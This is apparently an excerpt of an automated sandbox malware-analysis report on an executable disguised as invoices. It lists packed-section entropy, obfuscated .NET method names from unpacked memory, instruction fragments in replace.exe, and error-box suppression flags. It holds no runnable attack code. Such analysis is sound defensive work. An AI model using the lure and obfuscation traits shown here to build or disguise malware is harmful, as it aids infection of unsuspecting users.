Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E04054 pushad ; iretd 5_2_00E04060
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1B010 push edx; ret 5_2_00E1B011
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E013A1 push ebx; ret 5_2_00E013A2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1231D push edi; retf 5_2_00E12328
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E065AF push ecx; ret 5_2_00E065B3
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E0E50D pushfd ; iretd 5_2_00E0E51F
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E15684 push ss; retf 5_2_00E15688
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1B62C pushad ; retf 5_2_00E1B62F
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E068C7 push cs; retf 5_2_00E068C8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1FAD6 push es; iretd 5_2_00E1FADE
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1ABE0 push ebx; ret 5_2_00E1ABE1
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E06BA3 push es; ret 5_2_00E06BA6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1FBB8 push edx; iretd 5_2_00E1FBD8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E12B90 push ds; ret 5_2_00E12BDE
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: section name: .text entropy: 7.956113865860276
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, kma1x54xuTiP9R11kj.cs High entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, X1CrKNnxpMbljlKm9W.cs High entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, PxLb1bcx15A1uXJ9Uc.cs High entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, iZSt4ghAtFYRjZI1vg.cs High entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, Ql8RokJdL51xRiqnMr.cs High entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, uOkihsIx61umRTI2am.cs High entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, SSYGWfDca6ipkM6C75.cs High entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, S38KRJ2VkyZ1gfg8J9.cs High entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, AYVbSx7pZJ3eY1l21R.cs High entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, nBOhRD9uDmTdZtjJge.cs High entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, QBCN3fMt5TmxSuJTjmm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, TgjSrj0uw35pWBoReq.cs High entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xQiJO5us6DiOO5sIgg.cs High entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs High entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, lHvGJbLRUxqHjuNVyP.cs High entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, f7t0WrYoXNeVinHJdg.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, sir47mZZTPCbePi31b.cs High entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, VBBrj4q7OxhL1AOEAN.cs High entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, uRaCHDMK1mN0X9ZlUAA.cs High entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, yVybD364GKpxs3MmaR.cs High entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, VUpQ3JzfQcgbpyyG6Y.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, NVc1yVXpcuL61Ykq2a.cs High entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, kma1x54xuTiP9R11kj.cs High entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, X1CrKNnxpMbljlKm9W.cs High entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, PxLb1bcx15A1uXJ9Uc.cs High entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, iZSt4ghAtFYRjZI1vg.cs High entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, Ql8RokJdL51xRiqnMr.cs High entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, uOkihsIx61umRTI2am.cs High entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, SSYGWfDca6ipkM6C75.cs High entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, S38KRJ2VkyZ1gfg8J9.cs High entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, AYVbSx7pZJ3eY1l21R.cs High entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, nBOhRD9uDmTdZtjJge.cs High entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, QBCN3fMt5TmxSuJTjmm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, TgjSrj0uw35pWBoReq.cs High entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xQiJO5us6DiOO5sIgg.cs High entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs High entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, lHvGJbLRUxqHjuNVyP.cs High entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, f7t0WrYoXNeVinHJdg.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, sir47mZZTPCbePi31b.cs High entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, VBBrj4q7OxhL1AOEAN.cs High entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, uRaCHDMK1mN0X9ZlUAA.cs High entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, yVybD364GKpxs3MmaR.cs High entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, VUpQ3JzfQcgbpyyG6Y.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, NVc1yVXpcuL61Ykq2a.cs High entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, kma1x54xuTiP9R11kj.cs High entropy of concatenated method names: 'biPcQ8QnSc', 'eRUcyYSs1q', 'qiYcZlCAQl', 'S2rc3XRmPw', 'WLUcD42k02', 'OcXc6WrNpG', 'uVG61bDh8kogIV5qxi', 'Fvc8HJ0Vyeml3IOjAR', 'j7xccrTWPl', 'WQKc1Ba07E'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, X1CrKNnxpMbljlKm9W.cs High entropy of concatenated method names: 'p58DVS9V36', 'TPgD8XLFka', 'w19DpIHbP6', 'hukDebIPJK', 'CATD94Fnce', 'cyEDXMLxcD', 'EP6DuGfRQW', 'RndDS0RVMn', 'gmyDrJbZv3', 'Dk7DtduAu6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, PxLb1bcx15A1uXJ9Uc.cs High entropy of concatenated method names: 'pB4QJqvunv', 'DR2QCctZdy', 'ocnQnjAiDq', 'YnmQAXfOxv', 'BjJQseZSey', 'k1oQolcO9C', 'jvtQ0rDAvW', 'Y3HQI1FUZ4', 'mCvQd6WO5p', 'HL6QhnFWmS'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, iZSt4ghAtFYRjZI1vg.cs High entropy of concatenated method names: 'DfqaLLWXx4', 'I9paY77avq', 'ugoa4qInaZ', 'ToString', 'qlCaEWD8Nq', 'LcQamhk1TA', 'rB9ThY31EaVV2hKbD28', 'lga7Rd3NoI2HbbvGPM0', 'Dku3Km38MPRM7EJxM9d', 'JRp3Wq3v1VYJUdGmWE5'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, Ql8RokJdL51xRiqnMr.cs High entropy of concatenated method names: 'ToString', 'oUM6wVuHNm', 'FCw69G3PNI', 'tKr6XXq67H', 'F606u3IGTS', 'K2Z6SueFFw', 'JaE6rsfgWl', 'b2o6tROclv', 'r9f628WLhK', 'l2K6qa0vc6'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, uOkihsIx61umRTI2am.cs High entropy of concatenated method names: 'Dispose', 'jbxcKwqf7w', 'TrIv9mwoyn', 'BPX77nRo3j', 'dVtcfE6Dbp', 'KXRczim44f', 'ProcessDialogKey', 'aZQvjSmlB3', 'FlAvc5ajef', 'hSEvvG8pkK'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, SSYGWfDca6ipkM6C75.cs High entropy of concatenated method names: 'UpdipnBjGC', 'WFHie8MYPo', 'jFBiLqcqgE', 'NRViYIc7Us', 'rbai4aeip3', 'rlsiEyZmrO', 'DIrimxq3hl', 'P0viWw6olD', 's5YiKGbmnC', 'L2aif1kHPl'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, S38KRJ2VkyZ1gfg8J9.cs High entropy of concatenated method names: 'eDVaFBl1mb', 'b3BaiHKr8Y', 'g3malBIEWx', 'PmJaQjcyyN', 'xH2ayG1KNS', 'lShl4XNxl0', 'vKjlE0Bt2s', 'Q0rlmU4NsC', 'ENglW8XKIS', 'XaNlKHVNBG'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, AYVbSx7pZJ3eY1l21R.cs High entropy of concatenated method names: 'Knc5ZNWrsa', 'H7L53xqNkg', 'ToString', 'XWn5gmAN4S', 'OuZ5iBKOfr', 'BYb5BQcYMf', 'tJt5lyHAEk', 'nHS5aYNIIT', 'ckE5QFcC22', 'cKC5yHtikZ'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, nBOhRD9uDmTdZtjJge.cs High entropy of concatenated method names: 'CflkgO7TKV', 'nhOkieGuCW', 'AYgkBgOeAp', 'dCXklMmnp5', 'rUikaWMCa6', 't1pkQRhjox', 'bfXkypiGt2', 'APokbG1JiA', 'CfikZvmHrw', 'pRKk3jUiJY'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, QBCN3fMt5TmxSuJTjmm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrKOpQjPde', 'DixOela0kX', 'RsqOLZfigD', 'z9hOY3h5nI', 'jf0O4pLkTq', 'zpkOEgSgjy', 'CnWOmnYlgU'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, TgjSrj0uw35pWBoReq.cs High entropy of concatenated method names: 'MnL5WIuVhV', 'vlU5fWq20M', 'heJkjDvRco', 'VUtkcaDwnU', 'rtj5wFNtWR', 'Uuv58tyvj0', 'XYf5xVQU3n', 'WfL5plZL8A', 'm105e3ZQAC', 'yKT5LaOPax'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xQiJO5us6DiOO5sIgg.cs High entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs High entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, lHvGJbLRUxqHjuNVyP.cs High entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, f7t0WrYoXNeVinHJdg.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, sir47mZZTPCbePi31b.cs High entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VBBrj4q7OxhL1AOEAN.cs High entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, uRaCHDMK1mN0X9ZlUAA.cs High entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, yVybD364GKpxs3MmaR.cs High entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VUpQ3JzfQcgbpyyG6Y.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, NVc1yVXpcuL61Ykq2a.cs High entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
